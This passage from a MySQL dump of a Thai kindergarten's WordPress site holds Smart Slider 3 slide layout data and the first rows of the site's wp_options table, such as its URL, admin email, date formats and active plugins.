pacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"Choose a source from the background top tab then upload an image or pick a background color.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Read More\",\"namesynced\":1,\"item\":{\"type\":\"button\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"center\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"0568f6ff\\\"}]}\",\"style\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"0568f6ff\\\",\\\"opacity\\\":100,\\\"padding\\\":\\\"1|*|2|*|1|*|2|*|em\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"5\\\"},{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"ffffffff\\\"}]}\",\"content\":\"Next Slide\",\"nowrap\":\"1\",\"fullwidth\":\"0\",\"href\":\"NextSlide[]\",\"href-target\":\"_self\",\"href-rel\":\"\",\"class\":\"\",\"icon\":\"\",\"iconsize\":\"100\",\"iconspacing\":\"30\",\"iconplacement\":\"left\"}}}]},{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitorder\":0,\"mobileportraitinneralign\":\"center\",\"mobileportraitorder\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-LnImbm1HgUAv\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"3/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"mobileportraitmaxwidth\":300,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Image\",\"namesynced\":1,\"item\":{\"type\":\"image\",\"values\":{\"image\":\"https://smartslider3.com/wp-content/uploads/slider424/background.png\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"size\":\"auto|*|auto\",\"alt\":\"\",\"title\":\"\",\"href-class\":\"\"}}}]}]}]}]','','https://smartslider3.com/wp-content/uploads/slider424/slidebackground.jpg','{\"type\":\"slide\",\"desktopportraitfontsize\":100,\"desktopportraitpadding\":\"10|*|60|*|10|*|60\",\"tabletportraitpadding\":\"10|*|50|*|10|*|50\",\"mobileportraitpadding\":\"10|*|10|*|35|*|10\",\"record-slides\":0,\"thumbnailType\":\"default\",\"static-slide\":0,\"slide-duration\":0,\"ligthboxImage\":\"\",\"background-animation\":\"\",\"background-animation-color\":\"333333ff\",\"background-animation-speed\":\"default\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"\",\"background-type\":\"image\",\"backgroundColor\":\"ffffff00\",\"backgroundGradient\":\"off\",\"backgroundColorEnd\":\"ffffff00\",\"backgroundColorOverlay\":0,\"backgroundImage\":\"https://smartslider3.com/wp-content/uploads/slider424/slide1.png\",\"backgroundFocusX\":50,\"backgroundFocusY\":50,\"backgroundImageOpacity\":100,\"backgroundImageBlur\":0,\"backgroundAlt\":\"\",\"backgroundTitle\":\"\",\"backgroundMode\":\"default\",\"guides\":\"eyJob3Jpem9udGFsIjpbXSwidmVydGljYWwiOltdfQ==\",\"version\":\"3.4.0\"}',1,0),
(2,'Build & Design',1,'1970-01-01 00:00:00','1970-01-01 00:00:00',1,0,'[{\"type\":\"content\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":1120,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitselfalign\":\"center\",\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-TPnUuKlAWVoC\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"layers\":[{\"type\":\"row\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"desktopportraitgutter\":0,\"desktopportraitwrapafter\":0,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"tabletportraitgutter\":20,\"mobileportraitinneralign\":\"inherit\",\"mobileportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"mobileportraitgutter\":20,\"mobileportraitwrapafter\":1,\"mobileportraitmaxwidth\":400,\"mobileportraitselfalign\":\"inherit\",\"mobilelandscapewrapafter\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-NmnNQvKK01kO\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"_self\",\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"ffffff00\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"borderwidth\":\"1|*|1|*|1|*|1\",\"borderstyle\":\"none\",\"bordercolor\":\"FFFFFFFF\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"fullwidth\":1,\"stretch\":0,\"name\":\"Row\",\"namesynced\":1,\"cols\":[{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"10|*|10|*|10|*|10|*|px\",\"desktopportraitorder\":0,\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitmaxwidth\":0,\"mobileportraitinneralign\":\"left\",\"mobileportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitorder\":2,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-R5Jkk06Nmzr4\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"2/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":60,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Jeans Store Interior\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"36||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.2\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"02. Build & Design\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Lorem ipsum dolor sit amet, consect\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"24||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"weight\\\":300,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Build any layout with layers and customize your designs limitlessly.\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 1\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"To add a layer, click the green plus button in the left sidebar and select the type of layer.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 2\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"Select any layer and you can edit its content and style properties in the layer window.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Read More\",\"namesynced\":1,\"item\":{\"type\":\"button\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"center\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"0568f6ff\\\"}]}\",\"style\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"0568f6ff\\\",\\\"opacity\\\":100,\\\"padding\\\":\\\"1|*|2|*|1|*|2|*|em\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"5\\\"},{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"ffffffff\\\"}]}\",\"content\":\"Next Slide\",\"nowrap\":\"1\",\"fullwidth\":\"0\",\"href\":\"NextSlide[]\",\"href-target\":\"_self\",\"href-rel\":\"\",\"class\":\"\",\"icon\":\"\",\"iconsize\":\"100\",\"iconspacing\":\"30\",\"iconplacement\":\"left\"}}}]},{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitorder\":0,\"mobileportraitinneralign\":\"center\",\"mobileportraitorder\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-iYi6ZKk8yeVp\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"3/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"mobileportraitmaxwidth\":300,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Image\",\"namesynced\":1,\"item\":{\"type\":\"image\",\"values\":{\"image\":\"https://smartslider3.com/wp-content/uploads/slider424/buildanddesign.png\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"size\":\"auto|*|auto\",\"alt\":\"\",\"title\":\"\",\"href-class\":\"\"}}}]}]}]}]','','https://smartslider3.com/wp-content/uploads/slider424/buildanddesign.jpg','{\"type\":\"slide\",\"desktopportraitfontsize\":100,\"desktopportraitpadding\":\"10|*|60|*|10|*|60\",\"tabletportraitpadding\":\"10|*|50|*|10|*|50\",\"mobileportraitpadding\":\"10|*|10|*|35|*|10\",\"record-slides\":0,\"thumbnailType\":\"default\",\"static-slide\":0,\"slide-duration\":0,\"ligthboxImage\":\"\",\"background-animation\":\"\",\"background-animation-color\":\"333333ff\",\"background-animation-speed\":\"default\",\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"\",\"background-type\":\"image\",\"backgroundColor\":\"ffffff00\",\"backgroundGradient\":\"off\",\"backgroundColorEnd\":\"ffffff00\",\"backgroundColorOverlay\":0,\"backgroundImage\":\"https://smartslider3.com/wp-content/uploads/slider424/slide2.png\",\"backgroundFocusX\":50,\"backgroundFocusY\":50,\"backgroundImageOpacity\":100,\"backgroundImageBlur\":0,\"backgroundAlt\":\"\",\"backgroundTitle\":\"\",\"backgroundMode\":\"default\",\"guides\":\"eyJob3Jpem9udGFsIjpbXSwidmVydGljYWwiOltdfQ==\",\"version\":\"3.4.0\"}',2,0);
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=1172683 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES
(1,'siteurl','http://watprato.ssk.in.th','yes'),
(2,'home','http://watprato.ssk.in.th','yes'),
(3,'blogname','โรงเรียนอนุบาลวัดพระโต','yes'),
(4,'blogdescription','','yes'),
(5,'users_can_register','0','yes'),
(6,'admin_email','patcharapol@ro.ac.th','yes'),
(7,'start_of_week','1','yes'),
(8,'use_balanceTags','0','yes'),
(9,'use_smilies','1','yes'),
(10,'require_name_email','1','yes'),
(11,'comments_notify','1','yes'),
(12,'posts_per_rss','12','yes'),
(13,'rss_use_excerpt','0','yes'),
(14,'mailserver_url','mail.example.com','yes'),
(15,'mailserver_login','login@example.com','yes'),
(16,'mailserver_pass','password','yes'),
(17,'mailserver_port','110','yes'),
(18,'default_category','1','yes'),
(19,'default_comment_status','open','yes'),
(20,'default_ping_status','open','yes'),
(21,'default_pingback_flag','1','yes'),
(22,'posts_per_page','12','yes'),
(23,'date_format','j F Y','yes'),
(24,'time_format','G:i น.','yes'),
(25,'links_updated_date_format','j F Y G:i น.','yes'),
(26,'comment_moderation','0','yes'),
(27,'moderation_notify','1','yes'),
(28,'permalink_structure','','yes'),
(29,'rewrite_rules','','yes'),
(30,'hack_file','0','yes'),
(31,'blog_charset','UTF-8','yes'),
(32,'moderation_keys','','no'),
(33,'active_plugins','a:10:{i:0;s:55:\"advanced-google-recaptcha/advanced-google-recaptcha.php\";i:1;s:59:\"content-views-query-and-display-post-page/content-views.php\";i:2;s:25:\"generateblocks/plugin.php\";i:3;s:33:\"kadence-blocks/kadence-blocks.php\";i:4;s:15:\"kirki/kirki.php\";i:5;s:47:\"one-click-demo-import/one-click-demo-import.php\";i:6;s:31:\"popup-builder/popup-builder.php\";i:7;s:25:\"seed-fonts/seed-fonts.php\";i:8;s:27:\"seed-social/seed-social.php\";i:9;s:61:\"team-builder-member-showcase/team-builder-member-showcase.php\";}','yes'),
(34,'category_base','','yes'),
(35,'ping_sites','https://rpc.pingomatic.com/','yes'),
(36,'comment_max_links','2','yes'),
(37,'gmt_offset','7','yes'),
(38,'default_email_category','1','yes'),
